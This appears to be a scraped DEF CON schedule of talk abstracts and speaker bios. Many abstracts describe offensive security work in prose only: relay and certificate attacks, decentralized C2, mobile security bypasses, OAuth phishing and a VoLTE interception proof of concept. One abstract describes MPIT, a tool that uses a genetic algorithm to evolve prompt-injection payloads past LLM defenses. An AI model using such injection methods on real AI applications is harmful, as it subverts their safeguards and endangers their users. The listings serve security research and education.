Metasploit continues to expand support for Active Directory Certificate Services attacks, as well as its protocol relaying capability and attack workflows for evergreen vulnerabilities. This year, we added support for SMB-to-LDAP relaying and SMB-to-HTTP relaying, as well as support to identify and exploit a number of AD CS flaws. We’ve also added the new PoolParty process injection capability to Windows Meterpreter sessions, along with support for System Center Configuration Manager attack workflows.
Speakers:Spencer "ZeroSteiner" McIntyre,Jack HeyselSpencer is a senior security research manager at Rapid7, where he works on the Metasploit Framework. He has been contributing to Metasploit since 2010, a committer since 2014, and a core team member at Rapid7 since 2019. Previously, he worked at a consulting firm working with clients from various industries, including healthcare, energy, and manufacturing. He is an avid open source contributor and Python enthusiast.
SpeakerBio: Jack HeyselJack is a senior security researcher at Rapid7, where he contributes to and helps maintain the Metasploit Framework. He started at Rapid7 in 2016 working on their vulnerability management solution. He transitioned to the Metasploit team in 2021 and has been happily writing and reviewing exploits ever since. While AFK, he enjoys exploring the mountains and outdoors that surround his home.
- ics Calendar file
Distributed data replication systems are more than just tools for redundancy—they’re fertile ground for creative abuse. In this talk, we explore how technologies like NFTs, IPFS, Codex, and Cloudflare R2 can become resilient C2 infrastructures, payload delivery systems, and phishing hosting that challenge takedown efforts. Welcome to the next phase of decentralized threats.
This sequel to “MFT: Malicious Fungible Tokens” explores how distributed data replication systems can be used for malicious purposes. We’ll demonstrate how technologies like Codex, WhenFS, IPFS, and Cloudflare R2 buckets can store and distribute C2 commands, payloads, and even phishing campaigns such as templates or client-side drainers. These systems enable infrastructures that are resistant to takedowns and, in some cases, nearly unstoppable. Through practical examples and live demonstrations, we’ll uncover the risks these systems pose and discuss their implications for security teams.
This talk is a continuation of "Everything is a C2 if you're brave enough" from Red Team Village and "MFT: Malicious Fungible Tokens" from Adversary Village, which explains how to turn NFTs into immortal C2 Servers. It is not needed to have attended these talks as a short recap will be featured.
Speakers:Mauro Eldritch,Nelson Colón
- ics Calendar file
This is MHV's premier year at DEFCON, and we're bringing the heat of the South China Sea to DEF CON. Are you ready to fight and compete to lift the digital blockade on Isla Hexa?
We're bringing tech so advanced that nothing like it has ever hit the DEF CON floor: AI-controlled unmanned watercraft, a narcotics smuggling vessel, real crane control systems from the largest ports in the western hemisphere -- and so much more.
This will be an incredibly challenging and engaging cross-functional CTF contest where teams will get exposed to the little-known tools and technologies that our global maritime economy depends upon -- and will demonstrate their strength in both defending and weaponizing these to liberate the friendly nation of Isla Hexa.
SpeakerBio: Duncan Woodbury, Maritime Hacking Village
- ics Calendar file
Let's see where the teams and contestants of the MHV CTF drop anchor at the end of the day! A review of the current leaderboard and players still in the race to liberate Isla Hexa.
SpeakerBio: KennethSalt
- ics Calendar file
YO HO! The Maritime Hacking Village (MHV) has set sail for LVCC to deliver the first and only immersive maritime hacking experience for you to learn what it takes to exploit and defend real-world maritime systems. Experience a weekend of immersive hacking experiences at MHV full of hands-on training and education on the depths of maritime technology and security. We’ve scoured the earth and seas to bring you “swarm AI”-enabled unmanned watercraft, autonomous deep-sea robots, the murky insides of ports, cranes, container ships, maritime traffic control, and more. You’ll be hard-pressed to find maritime systems anywhere on earth with comparable badassery – and we dare to say that these will be the most advanced cyberphysical systems available at DEF CON.
Join us to learn about what MHV has to offer, so we can help you get oriented and engaged in a weekend of unprecedented maritime hacking experiences and real life cyber pirate shenanigans.
SpeakerBio: Kitty Hegemon
- ics Calendar file
Microsoft will present practical, tool-centric journey for cybersecurity professionals to rapidly build, deploy, and scale AI-powered capabilities using Microsoft’s AI ecosystem. Rather than focusing on abstract AI enablement, the presentation showcases how operators and developers can directly apply tools like Azure AI Foundry, Security Copilot, GitHub Copilot, and Jupyter Notebooks to solve real-world security challenges—faster and with greater precision. The narrative walks through: • AI-enhanced security operations: Integrating Azure OpenAI and Jupyter Notebooks for threat detection, anomaly analysis, and incident summarization. • Agentic workflows: Demonstrating how multi-agent systems can orchestrate complex tasks like querying vector databases, calling APIs, and reflecting on outcomes. • Toolchain depth: Highlighting the breadth of Microsoft’s AI stack—from foundational models to observability, governance, and trustworthy AI safeguards. • Developer empowerment: Emphasizing how the Azure AI Foundry SDK and model catalog enable rapid prototyping, customization, and deployment of AI agents in familiar environments like GitHub and Visual Studio.
Speakers:David Caswell,Jared Graff,Joe Zerafa,Robert Soligan
- ics Calendar file
Learn game scripting languages through fun minecraft puzzles
- ics Calendar file
Explore the field of embedded systems security with an introduction to MITRE’s Embedded Capture the Flag (eCTF) competition, an annual competition for students in high school through grad school.
Participants will be introduced to the structure of the competition and will gain experience working with microcontrollers by building, flashing, and interacting with the reference design of the 2025 eCTF. They will then explore some basic techniques for attacking the unsecured design.
After, participants can dive deeper by attacking real designs submitted by students.
Participants must have a computer (Windows/Mac/Linux) with internet access and Python 3.12+ and Docker Desktop.
SpeakerBio: Kyle Skey, Chief Engineer, Electronic Systems Security at MITRE
- ics Calendar file
The rapid advancement of large language models (LLMs) is reshaping the landscape of cybersecurity. These models are not only achieving higher benchmarks in math, coding, and cybersecurity tasks but are also being leveraged by threat actors to enhance resource development and social engineering capabilities. As LLMs continue to evolve, what could autonomous cyber capabilities powered by these models look like? How can we responsibly harness their potential for adversary emulation and defense? In this talk, we will explore the integration of LLMs into MITRE Caldera, a scalable automated adversary emulation platform, and investigate how these models can transform adversary emulation through three distinct paradigms: as planners, as factories for constructing custom cyber abilities, and as forward-deployed autonomous agents. Drawing on existing research, including papers on LLM-assisted malware development and benchmarks for offensive cyber operations, we will examine the capabilities of LLMs in generating plausible emulations of advanced persistent threats (APTs).
The session will feature live demonstrations showcasing how LLMs can replicate adversary profiles, construct new cyber abilities on the fly, and autonomously execute emulation tasks. Attendees will gain insights into the performance of these paradigms, their implications for purple teaming, and the challenges of maintaining realistic emulations. Finally, we will look ahead to the future of adversary emulation, discussing how APTs might leverage autonomous or semi-autonomous LLM capabilities in practice and the role of increasingly powerful models in shaping the next generation of cybersecurity tools. Whether you're a defender, researcher, or technologist, this talk will provide a compelling glimpse into the possibilities and risks of LLM-enabled adversary emulation.
Speakers:Ethan Michalak,Mark PerryEthan Michalak is a cybersecurity engineer and an avid CTF player. Ethan pursues efforts in adversary emulation, detection engineering, and malware development. In his free time, Ethan plays video games, reads a book, or makes a cocktail.
SpeakerBio: Mark Perry, Lead Applied Cyber Security Engineer at MITRE CorpMark Perry is a Lead Applied Cyber Security Engineer at MITRE Corp, where he specializes in adversary emulation and work development. With a robust background in infrastructure and cyber security frameworks, Mark brings extensive expertise to his role, focusing on fortifying systems against sophisticated cyber threats. He has worked on projects involving adversary emulation, red teaming, cyber threat intelligence, and software development. Mark also leads development and delivery of Caldera workshops, providing participants with practical, hands-on training utilizing cybersecurity techniques. Additionally, he actively promotes Caldera’s benefactor program, fostering community support and engagement to further the development of cybersecurity tools and resources. Outside of his professional endeavors, Mark enjoys traveling and is a supercar enthusiast.
- ics Calendar file
Capture the Flag (CTF) events featuring mobile application security challenges at varying levels of difficulty, also providing a ranking system to evaluate and compare participants’ skills.
This beginner-friendly mobile app CTF contest will include challenges across various categories, including:
Dynamic Code Instrumentation Reversing Native Code Code Obfuscation/Deobfuscation Exploiting app components Malware Analysis Mobile Forensics Bypassing Security Mechanisms Exploiting WebViews
- ics Calendar file
Mobile game hacking workshop for mobile gamers
- ics Calendar file
En un panorama donde las aplicaciones Android están cada vez más protegidas, realizar una auditoría efectiva requiere más que solo conocimientos básicos. La implementación de mecanismos como detección de root, validación de integridad mediante SafetyNet o Play Integrity, SSL pinning y almacenamiento seguro se ha vuelto común, pero muchas veces están mal configurados o pueden ser evadidos con las herramientas adecuadas. En esta charla presento una guía de supervivencia actualizada para pentesters móviles, enfocada exclusivamente en Android, basada en casos reales de auditorías y experiencias en campo.x000D x000D Durante la sesión se explicarán a fondo los mecanismos de seguridad más frecuentes en Android y cómo pueden ser evadidos. Mostraremos bypasses de root detection, device integrity y strong integrity utilizando herramientas como Frida, Objection y módulos como PlayIntegrityFix y TrickyStore. También veremos cómo interceptar tráfico cifrado mediante técnicas de SSL unpinning, incluso cuando las apps usan mecanismos avanzados como certificate pinning o validaciones a nivel de TEE. Para ilustrar todo esto, se utilizará una app vulnerable especialmente creada para la charla, donde se explotarán fallas reales como almacenamiento inseguro, content providers mal configurados y flujos de autenticación débiles.x000D x000D Además, se compartirá una metodología práctica para montar un entorno de pruebas profesional con emuladores y dispositivos físicos rooteados, configurando herramientas como Burp Suite, mitmproxy y adb para análisis dinámico. Se explicará cómo combinar análisis estático y dinámico para maximizar la cobertura, identificar vectores de ataque y entender el comportamiento interno de las aplicaciones. Esta charla está diseñada para profesionales de seguridad ofensiva, pentesters y desarrolladores interesados en conocer cómo se atacan realmente las apps Android hoy en día. Al finalizar, los asistentes tendrán técnicas listas para aplicar, un conjunto de herramientas funcionales, y una perspectiva práctica para enfrentar cualquier auditoría móvil de forma más efectiva y estructurada.x000D
SpeakerBio: Luis De la Rosa, Security Consultant at Bishop FoxConsultor de seguridad en Bishop Fox , he trabajado en múltiples proyectos de auditoría de aplicaciones Android, identificando y remediando vulnerabilidades críticas. Mis investigaciones relacionadas a Mobile pentest han sido presentadas en conferencias anteriores en mexico como lo son : “Congreso Internacional de Seguridad de la Informacion (CISI) organizado por la Universidad Autonoma de Nuevo Leon” , Meetups de Hack the Box tanto en Guadalajara como en Monterrey , HackGDL y en la EkoParty en Argentina. Además, en la empresa donde actualmente trabajo he creado herramientas para poder automatizar ciertos procesos durante las pruebas de mobile pentest.
- ics Calendar file
With all the modern security tools at our fingertips, you would think attackers would have a harder time. But year after year, they keep getting in, often using the same techniques they have used for decades. This panel takes a real-world look at why high-tech defenses still fall to low-tech tactics. We will talk about where things break down, why the basics still matter, and how defenders can rethink their approach to stay ahead of persistent threats.
Speakers:Niru Ragupathy,Charlie Waterhouse,Tay Sze Ying,Michael "r00tkillah",Drinor SelmanajNiru is a Senior Staff Security Engineer and Manager at Google. She leads the Offensive security team, where she supports the program and works on red team exercises. In her free time she doodles corgis and writes CTF challenges.
SpeakerBio: Charlie Waterhouse, Technical Security Analyst at Synack Inc.Charles Waterhouse is a cybersecurity strategist with a unique background - after two decades in the airline industry, he transitioned into offensive security, helping manage over 2,400 engagements with teams of 1,000+ researchers across commercial and government sectors. He advises Global 500 executives on red team strategy, AI/LLM testing, and emerging threats. A contributor to OWASP and frequent speaker at security conferences, Charles blends hands-on technical skill with a business-first mindset to defend some of the world’s most critical systems.
SpeakerBio: Tay Sze Ying, Head of Cyber Threat Intel & Hunting Advanced Cyber Capabilities at Home Team Science & Technology Agency (HTX)Sze Ying is the Head of Cyber Threat Intelligence and Hunting with Home Team Science and Technology Agency. Sze Ying started off as a system engineer managing the public key infrastructure for certificates before pivoting into red and blue teaming. With 12 years of ICT security experience under her belt in both private and public sector, her areas of expertise include digital forensics and incident response, threat hunting and threat intelligence.
SpeakerBio: Michael "r00tkillah", Red Team Lead at Oracle CloudMichael (@r00tkillah) has done hard-time in real-time. An old-school computer engineer by education, he spends his days co-leading the Red Team at Oracle CLoud. Previously, he developed and tested embedded hardware and software, fooled around with boot roms, mobile apps, office suites, and written some secure software. On nights and weekends, he hacks on electronics, writes CFPs, and builds ridiculous rockets. He enjoys long walks through other people's computers.
SpeakerBio: Drinor Selmanaj, Founder and CTO at SentryDrinor Selmanaj is a cybersecurity frontier with over a decade of paramount experience in penetration testing, cyberterrorism combat, and global privacy amidst NATO representatives, multinational corporations, tech giants, and heads of state. Moreover, he is a prolific investor in the tech scene with several cybersecurity-related companies and initiatives under his name.At Sentry, Drinor leads a global team of cybersecurity researchers while providing cutting-edge penetration testing and other cybersecurity services to unicorn corporations, including some of the Big Four.Likewise, Selmanaj is well-known for his efforts in security education, having trained thousands of students while continuously responding to the chronic cybersecurity talent shortage. His students are renowned professionals employed in leading application security firms and have received multiple recognitions from numerous organizations, including the U.S. Department of Defense.
At Cyber Academy, he has developed state-of-the-art courses covering a variety of topics, ranging from the foundations of cybersecurity to red teaming and adversary emulations. Additionally, Drinor has developed cyber ranges equipped with the latest offensive and defensive scenarios for training the new cybersecurity workforce.As a consultant, he has assessed vulnerabilities, opportunities, and mitigation pathways for critical information infrastructures on a national level, the finance/health sector, and electoral systems. As a result, Drinor found success in providing a clear sight of national cybersecurity while delivering a comprehensive and concrete action plan.Drinor Selmanaj is an award-winning cybersecurity professional, lecturer, public speaker, and executive aspiring to boost innovation, all the while perpetually pursuing excellence and standing one step ahead of cyber threats
- ics Calendar file
One aspect that makes OT different from IT is the very different protocols used. Most OT/ICS manufacturers have their own protocols and each has their own advantages while serving up many different security vulnerabilities. This part will discuss some of the common OT/ICS protocols in use today and their vulnerabilities.
- ics Calendar file
Attackers are always looking for an easy way into OT networks. And what can be easier than having an OT/ICS asset exposed directly to the Internet where it can be compromised? Search engines like Google and Shodan can be used to easily find exposed and vulnerable hosts on the Internet. This part will walk through various reconnaissance and OSINT steps in findings OT/ICS assets exposed to the Internet.
- ics Calendar file
It is important to understand how attackers break into OT/ICS networks and what they do after they gain that initial foothold. In understanding how attackers do what they do, we can become better cyber defenders. This part will provide a high-level overview of the OT Penetration Tester Methodology based primarily on the MITRE ATT&CK for ICS framework.
- ics Calendar file
- ics Calendar file
Come join us for morning meditation. This workshop is inclusive of all bodies. EveryBODY is Welcome here. Meditation can help quiet the mind, manage stress, and enhance overall emotional well-being, making it a great way to start the day.
SpeakerBio: Megan AllenHi, I’m Megan Allen.
My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness - honoring a person's emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.
I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.
I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.
Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.
- ics Calendar file
Earth has been rendered uninhabitable, prompting mass migration from earth to mars. When one such routine trip veers off course, the passengers of the Aniara struggle to cope with their new lives.
A teenage girl named Cee and her father Damon land on a poisonous forest moon to mine for valuable gems. A series of betrayals, alliances, and conflicts with mercenaries and rival prospectors make their quest increasingly perilous.
A labor lawyer becomes the target of a cover surveillance operation after unwittingly receiving evidence of a political assassination. Gene Hackmann co-stars as a former intelligence operative who helps him evade the rogue agents.
A group of Astronauts Aboard the Icarus II are sent on a dangerous mission to reignite the dying sun.
- ics Calendar file
Prompt injection is an emerging and poorly standardized attack vector targeting large language model applications. Unlike traditional vulnerabilities, there is no universal testing methodology or tooling, making it difficult for penetration testers to assess the security posture of LLM-integrated systems. Matrix Prompt Injection Tool aims to fill this gap by automating the generation of diverse prompt injection payloads. [1] Dynamic Input Detection: MPIT scans target websites to identify expected input fields where LLMs might process user requests. [2] Payload Enrichment: Each pattern includes crafted elements such as exploit strings, delimiters, and reasoning cues, enhancing the quality of the penetration test. [3] Genetic Algorithm Optimization: The tool employs a genetic algorithm to evolve and refine injection patterns, increasing their success rate significantly across different LLM defenses. [4] Practical Utility for Pentesters: MPIT is designed to support real-world offensive security assessments, making LLM-targeted testing more feasible and effective. ShinoLLMApps is a collection of vulnerable LLM web applications that use RAG and tools to help you test MPIT and better understand prompt injection and its risks. More info at github.com/Sh1n0g1/mpit and shinohack.me/shinollmapp.
Speakers:Shota "Sh1n0g1" Shinogi,Sasuke "Element138" Kondo,Takeshi MatsudaShota is a security researcher at Macnica, pentest tools author, and CTF organizer. He is an expert in writing tools for red team to evade the detection from EDR, sandbox, IPS, antivirus, and other security solutions. His malware simulator ShinoBOT and ShinoLocker contributes to the cybersecurity industry to help the people who want to test malwares safely. He has more than 15 years of experience in the cybersecurity industry, starting his career with HDD encryption, NAC, IPS, WAF, sandbox, EDR, and penetration testing. He has spoken in several security and hacking conferences, including Black Hat, DEF CON, and BSidesLV. He also contributes to the education for the next generation security engineers through the Security Camp from 2015 consecutively in Japan.
SpeakerBio: Sasuke "Element138" KondoSasuke is a high school developer with a growing focus on LLM security. While relatively new to cybersecurity, he approaches it with a builder’s mindset shaped by his experience creating web applications for real-world use, such as supporting school operations. His interest in LLM vulnerabilities began at the 2024 Japan Security Camp, where he started developing MPIT, the prompt injector he first presented at CODE BLUE 2024 and is now bringing to DEF CON. Outside cybersecurity, he is a two-time silver medalist in Japan Linguistics Olympiad and a recent participant in Japan Olympiad in AI.
SpeakerBio: Takeshi MatsudaTakeshi Matsuda is an undergraduate at Keio University exploring prompt injection in LLMs. He co-developed MPIT during Japan Security Camp 2024 and has presented it at CODE BLUE.
- ics Calendar file
dade is a professional hacker and amateur rapper. He raps about his experiences with hacking, mental health, and his love of Hollywood Hacking. He enjoys the storytelling and wordplay elements of rapping, and many of his songs focus on these elements.
SpeakerBio: Dual CoreDual Core is an international hip hop duo. Hack all the things!
SpeakerBio: DJ nullAtlanta-based Drum & Bass DJ with a passion for everything related to tech, null will bring the basslines that send you on a journey into the spectrum of Drum & Bass music. Mixing liquid melodies into neurofunk basslines and causing the dancefloor to explode is one way for this DJ to make the crowd forget about the world outside the rave. Get ready to enter a null state and feel nothing but bass.
SpeakerBio: PatAttackDJ PatAttack is a Seattle-based EDM DJ and Security Nerd known for his dynamic live sets and genre-spanning mixes, including Drum and Bass, Brazilian Bass, Future Bass, and other things with Bass.
SpeakerBio: Miss JackalopeMiss Jackalope is DEF CON's Resident DJ. She's played all sorts of places, parties, and events. Her current faves are DnB, electro, and bass house. Usually she is spotted getting abused by her cats while trying to spin on her weekly Twitch show (twitch.tv/missjackalope) and in the Vendor room selling her legendary merch. She is the DEF CON Arts and Entertainment evangelist and leader of the Mighty Jackalope Army.She also has a dragons horde of claw game fun and Twitch replays on her Youtube channel! (youtube.com/@MissJackalope) Come join the party!
SpeakerBio: Syntax + Luna (VJ)SYNTAX blends hacker grit with underground beats. A pentester by day and DJ by night, his sets fuse drum & bass with tech-driven sound design, stego, and glitchy waves. From small town hacking roots to spinning at DEF CON, he’s built a rep in both cybersecurity and music. Whether teaching lockpicking, creating CTF soundtracks, or dropping live visuals with Luna, Syntax lives the hacker life loud and full throttle.
SpeakerBio: DJ XORACFrom the underground music scenes to the rebellious spirit of DEF CON, XORAC is a force to be reckoned with. Blending her passion for hacking and music, she crafts high-energy sets that traverse the realms of House and Drum n Bass. As a self-taught hacker and music fanatic, her performances are a testament to her relentless curiosity and refusal to conform. Whether spinning hypnotic house beats or relentless DnB drops, XORAC delivers a sound that resonates with the pulse of the DEF CON community—a celebration of creativity, resistance, and rebellion. Join her to dance to the future and hack the planet.
- ics Calendar file
Operating with modern red team tools has a lot of ins, a lotta outs, a lotta what-have-yous. If you were like me before operating with tools like Mythic, managing your projects with Ghostwriter, and analyzing your data automatically with Nemesis, you were probably living in the past and piecing things together manually, writing things down in a tedious, un-zen lack-of-system that would leave you scrambling at the end of testing, when your report should be about to go to a peer review or QA.
You might be saying, "But Michael, I like doing things manually and wasting mine and my client's time." Yeah, well, you know, that's just, like, your opinion, man.
That is entering a world of pain. I don't know about you, but when that's happening, I feel really out of my element.
Luckily, Mythic, Ghostwriter, and Nemesis really tie the room together and are a huge quality-of-life boost. No more will you say to yourself, "This aggressor script will not stand, man!" Sometimes the bear eats you, but it's high time you eat the bear.
Get ready to be bowled away by a modern approach to managing your red team operations with tools like Mythic, Ghostwriter, and Nemesis (or whatever else you can think of to plug into these tools' APIs if you're note into the whole brevity thing) to streamline your workflow.
You might get so excited that you'll flail your arms around in joy - but be careful man, there's a beverage here!
SpeakerBio: Michael DonleyMichael is an Adversary Simulation Consultant at SpecterOps, where he deals in testing all the things - networks, web apps, Kubernetes clusters, humans, physical sites, and especially the potency of energy drinks.
He is the Director of Volunteers for the Red Team Village and loves helping people new to the field (especially career changers) find their foothold in the infosec industry.
When he's not hacking stuff or learning about new things, he is a drummer for just about any improv show in Chicago that has music in it.
- ics Calendar file
The maritime domain's vastness often masks hidden threats. This talk explores leveraging Open-Source Intelligence (OSINT) to enhance maritime security. We'll demonstrate practical, low-cost methods to gather and analyze publicly available data – including vessel tracking, port data, and social media – for identifying anomalous behaviors and predicting potential cyber-physical risks. Attendees will learn actionable techniques to build a proactive threat intelligence picture without specialized tools, providing crucial insights for defenders in this critical sector
Speakers:Mehmet Önder Key,Furkan Aydogan,Samet Can TasciÖnder Key is a cybersecurity consultant specializing in critical infrastructure security, zero-day vulnerability analysis, and offensive security. He has advised organizations in high-security sectors such as defense, aerospace, and finance, with hands-on experience in both red teaming and strategic security engineering. His work has been featured across numerous countries and platforms, contributing to the discovery of systemic vulnerabilities. Currently, he provides consultancy to Burkut, Ogrit, Ravenailabs and continues to advance the global offensive security ecosystem by challenging traditional approaches to cybersecurity.
SpeakerBio: Furkan Aydogan, UNCWDr. Aydogan is an Assistant Professor of Computer Science at UNCW and a researcher in cybersecurity, digital forensics, and brainwave-based encryption systems. His Ph.D. focused on using EEG signals to secure IoT devices—blending neuroscience with cryptography. He’s a two-time award winner for research in VANET security and cognitive encryption.
SpeakerBio: Samet Can Tasci, BurkutSecSamet Can Tasci is a Red Hat Certified Linux System Administrator with over six years of experience in securing and automating enterprise infrastructure. He specializes in system hardening, containerization, and secrets management with HashiCorp Vault, and has a strong focus on DevOps workflows using Ansible and GitLab CI.
- ics Calendar file
(DCNextGen is for youth 8-18 attending DEF CON) A quick introduction to the giant network that is the internet, the parts that work together, and how data moved across (OSI model).
SpeakerBio: N3rd H3Rder, GOON at DCNextGenChild of God, Wife, and Mother | N3rd H3Rder | Cybersecurity Connector & Communicator. Enthusiastic about midday naps, dormant trees, and Oxford commas
- ics Calendar file
The Network-OS workshop will take you into the mysterious world which underpins modern computing and allows people to talk across the globe. This of course being the network itself. In this workshop you will familiarize yourself with the command line of network devices. Step by step, you will configure devices to talk to each other, share information about the computers connected to them, and relay their network information and traffic between each other. No experience needed, know how to type and copy/paste.
- ics Calendar file
Be the Match is returning to DEF CON for its 12th year, to run a registry drive for the National Marrow Donor program! Swing by and check out one of the coolest biohacks out there, and how you could be the next person to save a life!
- ics Calendar file
Traditional digital security often falls short when applied to IoT environments, where devices are limited in processing power and exposed to a wider range of threats. Human vulnerabilities—especially against deepfake-style attacks—further weaken current systems. Static biometrics like fingerprints or facial scans are no longer enough. This work proposes a new direction: using the brain’s unique electrical activity (EEG signals) as a security layer. These dynamic, hard-to-replicate patterns offer a way to authenticate users without storing sensitive data or relying on heavy computation. By grounding trust in the user’s own biological signals, this approach offers a lightweight, resilient solution tailored to the constraints of modern IoT devices.
Speakers:Mehmet Önder Key,Temel Demir,Ahmet Furkan Aydogan.Önder Key is a cybersecurity consultant specializing in critical infrastructure security, zero-day vulnerability analysis, and offensive security. He has advised organizations in high-security sectors such as defense, aerospace, and finance, with hands-on experience in both red teaming and strategic security engineering. His work has been featured across numerous countries and platforms, contributing to the discovery of systemic vulnerabilities. Currently, he provides consultancy to Burkut, Ogrit, Ravenailabs and continues to advance the global offensive security ecosystem by challenging traditional approaches to cybersecurity.
SpeakerBio: Temel Demir, Cybersecurity Lead at KPMG
- ics Calendar file
Ongoing AMA booth with volunteers and speakers answering all your DEF CON and cyber questions
- ics Calendar file
Ransomware and cybercrime assaults are both pervasive and profoundly distressing, NO-HAVOC (Networked Online Helpline for All Victims of Cybercrime) pioneers a holistic approach to victim support by fusing technical support with genuine empathy. Drawing on Daniel Ward’s CONVERSA AI; originally crafted for mental-health support; and Lena Yu’s deep ties within the Malware Village research community, this session reveals how NO-HAVOC delivers real-time, location-aware guidance alongside emotional reassurance to individuals, charities, healthcare providers and businesses alike.
Speakers:Samuel Gasparro,Daniel Ward
- ics Calendar file
Come mingle with the glamorous, the genuine: the genderfluid, genderqueer, and genderless people of Queercon!
- ics Calendar file
Not sure where something is? Our Buddies will help you find it. Look for the folks in the pink safety vests. We're here to help.
- ics Calendar file
Noob-friendly CTF by MetaCTF, 100s of prizes, ticket for each challenge completed, raffle on Sunday at noon, helpers in the village
- ics Calendar file
Talks, AMA, CTF, and more
- ics Calendar file
North Korean threat actors are back, using fake job interviews to deliver BeaverTail, InvisibleFerret, OtterCookie and ChaoticCapybara, advanced malwares with unique implementations. This talk analyses their techniques, reverse-engineers their tools, and modifies them to reveal the secrets hidden within their C2 infrastructures, offering insights into defending against persistent, adaptive threats.
Speakers:Mauro Eldritch,José Gómez
- ics Calendar file
Every once in a while, we get a grim reminder that the open-source trust model that enables developers to use each other’s code and resources can be abused by attackers.
GitHub users recently suffered from such a wake-up call. In March 2025, the highly-publicized "tj-actions" incident came to light, throwing many GitHub organizations and users into panic, as their credentials were leaked via their supply chain. But while the masses were scared about the massive credential exposure, we were able to piece together evidence to show that the leakage wasn't the primary goal of this attack, and that the initial buzz was just the tip of the iceberg. Our investigations indicate that more highly-popular projects were targeted as part of this campaign, and DefCon will be the first place that we reveal the newly-discovered details.
We’ll reveal how the attack began months earlier than initially believed, with the attacker compromising multiple open-source projects utilizing them for lateral movement. We'll detail how the adversary maintained a low profile, patiently waiting to spear-target Coinbase. We will dissect the sophisticated evasion techniques employed and the attacker’s modus operandi, showing how the open-source access and trust model were weaponized to deliver a precise and calculated supply chain attack.
References:
SpeakerBio: Aviad HahamiSecurity researcher and experienced software engineer with a great passion for algorithms (graph-theory specifically), security research (vulnerability research, bug bounties), chaos engineering (YES!), frontends, backends, web services, systems architecture, infras, clouds(making them rain), and more :) Today, researching at Palo Alto Networks. Oh yea I also DJ
- ics Calendar file
Apple Find My is a crowdsourced offline tracking network designed to assist in recovering lost devices while maintaining privacy. By leveraging over a billion active Apple devices, it has become the world's largest device-locating network. While prior research has demonstrated the possibility of creating DIY trackers that attach to the Find My network, they are mainly for personal use and do not pose a threat for remote attacks. Recently, we found an implementation error in the Find My network that makes it vulnerable to brute-force and rainbow table attacks. With a cost of a few US dollars, the exploit turns computers into trackers without requiring root privileges. We are concerned that adversaries and intelligence agencies would find this exploit handy for user profiling, surveillance, and stalking. This demo is especially appealing to those interested in Find My network and Bluetooth tracking technologies. We will review how Find My offline finding works, elaborate in detail about our discoveries, techniques to make practical attacks, and provide source code for fun.
Speakers:Junming "Chapoly1305" Chen,Qiang ZengJunming is a PhD student at George Mason University. He works on IoT security and was previously a full-time security engineer in the electric automotive industry. He has a CompTIA Security+ certificate like everybody. He supports the Rizin Reverse Engineering Framework. This will be his first time presenting at DEF CON.
SpeakerBio: Qiang ZengQiang received his bachelor's and master's degrees from Beihang University and his PhD degree from Penn State University. He is an associate professor in the Department of Computer Science with George Mason University. He is the recipient of an NSF CAREER Award. His main research interest is computer systems security, with a focus on cyber-physical systems, Internet of Things, and mobile computing. He also works on adversarial machine learning.
- ics Calendar file
uncovered a mis-routed SIP policy on O2’s IMS core that let any device on the data network bypass the P-CSCF firewall and inject raw SIP traffic directly into the S-CSCF. A proof-of-concept “silent dialer” malware exploited the gap to auto-REGISTER rogue identities, issue INVITEs that redirected live VoLTE calls, and siphon RTP audio—while every packet looked like normal internal signaling. No internet, VPN or root exploits were needed; the flaw lived entirely in the operator’s own trust model, proving how a single IMS rule slip can open the door to full-scale voice and data surveillance.
SpeakerBio: Vinod Shrimali
- ics Calendar file
OAuthSeeker is a cutting-edge red team tool designed to simulate OAuth phishing attacks, specifically targeting Microsoft Azure and Office365 users. This tool facilitates the creation, management, and execution of phishing campaigns without requiring advanced technical skills. By leveraging malicious OAuth applications, OAuthSeeker allows offensive security engineers to perform targeted phishing attacks to compromise user identities and gain access to Microsoft Graph API and Azure resources. With features like an administrative control panel, token refresh capabilities, and customizable skins for user-facing components, OAuthSeeker provides an effective solution for testing security defenses against a common but often overlooked attack vector. The tool is easy to deploy with only a single pre-compiled Go binary with zero external dependencies and includes built-in support for LetsEncrypt. The documentation is highly detailed and outlines all the possible attack paths where this capability could be used during real-world red team engagements. The installation process is streamlined requiring only a single command to deploy a new instance of the application.
SpeakerBio: Adam "UNC1739" Crosser, Staff Security Engineer at PraetorianAdam Crosser is a Staff Security Engineer at Praetorian, specializing in offensive security research and tooling development. He began his career in red team operations, honing his skills in adversary simulation and advanced attack techniques. Now part of the Praetorian Labs team, Adam focuses on vulnerability research, exploit development, and building custom offensive security capabilities to support red team engagements—pushing the boundaries of adversary tradecraft.
- ics Calendar file
Accesses to the blockchain's state and logs leak highly sensitive information such as the user's identity, who it is trading with, and which crypto-asset the user is interested in trading. In this tutorial, we will go over two technologies for ensuring access pattern privacy, including Oblivious RAM (ORAM), and Private Information Retrieval (PIR). Unlike traditional encrypted databases that protect only the contents of data, our technologies additionally protect the queries, thus hiding users' intentions. We will describe two extremely simple constructions, one ORAM, and one PIR scheme. In particular, the ORAM algorithm is also the one used by industry leaders such as Signal and Meta. We will next show a demo for our oblivious key-value store implementation. We will also challenge the learners with a CTF problem that demonstrates how sensitive secrets can easily be leaked even when the memory contents are encrypted.
Speakers:Elaine Shi,Afonso TinocoElaine Shi is a professor in Carnegie Mellon University. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. She is a co-founder of Oblivious Labs, Inc. Her research on Oblivious RAM and differentially private algorithms have been adopted by Signal, Meta, and Google. She is a Packard Fellow, a Sloan Fellow, an ACM Fellow, and an IACR Fellow.
